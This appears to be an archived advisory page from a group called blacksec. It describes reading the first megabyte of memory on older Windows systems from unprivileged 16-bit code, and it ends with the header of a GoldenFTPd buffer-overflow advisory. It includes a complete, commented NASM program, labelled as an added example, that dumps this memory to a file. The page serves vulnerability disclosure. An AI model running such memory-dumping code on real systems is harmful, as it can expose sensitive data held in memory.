"Never let school get in the way of learning."
-- Mark Twain

[BL4CK] - Advisories

Here you will find an archived list of publicly available advisories published by blacksec.

Advisories

Article 0x01 : Hello World / MS Windows memory leakage



0x02 : MS Windows memory leakage :


Synopsis :

I wrote an article on this some time ago here. I discovered that unprivileged
users could access parts of the RAM under Windows products...

Details :

Current Windows products (newer than Win 9x) include a nice
MS-DOS emulation layer, so one can run 16-bit code under
Windows (with some limitations: no protected mode, for
instance, from my testing). I did not reverse the emulation
APIs; I just tested whether I could dump memory ranges using
16-bit assembly. Guess what? Yeah, it works!
Protected mode would have allowed dumping up to 4 GB of
memory (on a 32-bit box), but as mentioned above this does
not seem to be supported under Win XP; moreover, since
protected mode uses virtual memory, the program would
probably only be able to dump its own address space anyway :-(
Nonetheless, here is some assembly that runs in real mode.
The main limitation is that real-mode segment:offset
addressing only yields 20-bit physical addresses, so we can
only dump the first 1 MB of memory :-( - which is already bad,
since this area contains juicy information (check the above
URL for an example).
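The real-mode dump described above, written out as an added example; this is not the advisory's own listing and is not the author's code. It is a NASM .COM program that walks the 16 segments 0x0000..0xF000, writes 64 KiB from each through the DOS file API (INT 21h), and so produces a 1 MiB image of everything a real-mode program can address. The output filename LOWMEM.BIN is an assumption. It assembles with `nasm -f bin` and needs a DOS environment to run, i.e. NTVDM on 32-bit NT-family Windows (64-bit Windows does not ship NTVDM); what it captures is the first MiB of the address space NTVDM presents to the virtual DOS machine.

```nasm
; dump1m.asm - added example, not the advisory's original code.
; Assemble:  nasm -f bin -o dump1m.com dump1m.asm
; Run under DOS / NTVDM: dump1m.com  -> writes LOWMEM.BIN (1 MiB)
;
; In real mode a linear address is segment*16 + offset, so the
; reachable range is 0x00000..0xFFFFF (20 bits = 1 MiB).  We step DS
; through 0x0000, 0x1000, ..., 0xF000 and write the 64 KiB behind each
; segment as two 32 KiB chunks, because INT 21h/AH=40h takes a 16-bit
; byte count and DS:DX+CX must not cross the segment end.

        org 0x100
        bits 16

start:
        ; INT 21h AH=3Ch: create file, CX=attributes, DS:DX=ASCIZ name
        mov     ah, 0x3C
        xor     cx, cx
        mov     dx, fname
        int     0x21
        jc      fail
        mov     [handle], ax

        xor     si, si              ; si = segment being dumped
.seg_loop:
        mov     bx, [handle]        ; load before DS is repointed
        push    ds
        mov     ds, si              ; DS:DX now addresses the target memory
        xor     dx, dx              ; first half: offsets 0x0000..0x7FFF
        mov     cx, 0x8000
        call    write_chunk
        jc      .restore
        mov     dx, 0x8000          ; second half: offsets 0x8000..0xFFFF
        mov     cx, 0x8000
        call    write_chunk
.restore:
        pop     ds                  ; pop does not touch CF
        jc      fail_close
        add     si, 0x1000          ; next 64 KiB segment
        jnz     .seg_loop           ; 0xF000 + 0x1000 wraps to 0 -> done

        mov     bx, [handle]        ; INT 21h AH=3Eh: close handle in BX
        mov     ah, 0x3E
        int     0x21
        mov     ax, 0x4C00          ; INT 21h AH=4Ch: exit, AL = status 0
        int     0x21

fail_close:
        mov     bx, [handle]
        mov     ah, 0x3E
        int     0x21
fail:
        mov     ax, 0x4C01          ; exit status 1
        int     0x21

; write_chunk: INT 21h AH=40h, BX=handle, CX=count, DS:DX=buffer.
; Returns CF=1 on a DOS error or on a short write (AX < CX, e.g. disk
; full); CF=0 when all CX bytes were written.
write_chunk:
        mov     ah, 0x40
        int     0x21
        jc      .done               ; DOS already set CF on error
        cmp     ax, cx              ; AX < CX  ->  borrow  ->  CF=1
.done:
        ret

handle  dw 0
fname   db 'LOWMEM.BIN', 0          ; output name is an assumption
```

Segment 0x0000 contains the interrupt vector table and BIOS data area, 0xA000-0xBFFF is video memory and 0xF000 is the ROM BIOS image (a stub under NTVDM), so LOWMEM.BIN is easiest to read by seeking to `segment*16` for the region of interest.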

GoldenFTPd <= 1.93 (Win32) Buffer Overflow/Stack Corruption



BlackSecurity Advisory - Multiple Buffer Overflows
ID:       BL4CK-2005.11.14 - 0x2
Class:    Buffer Overflow/Stack Corruption
Package:  GoldenFTPd <= 1.93 (Win32)
Released: Nov 14, 2005
Remote:   Yes
Severity: Medium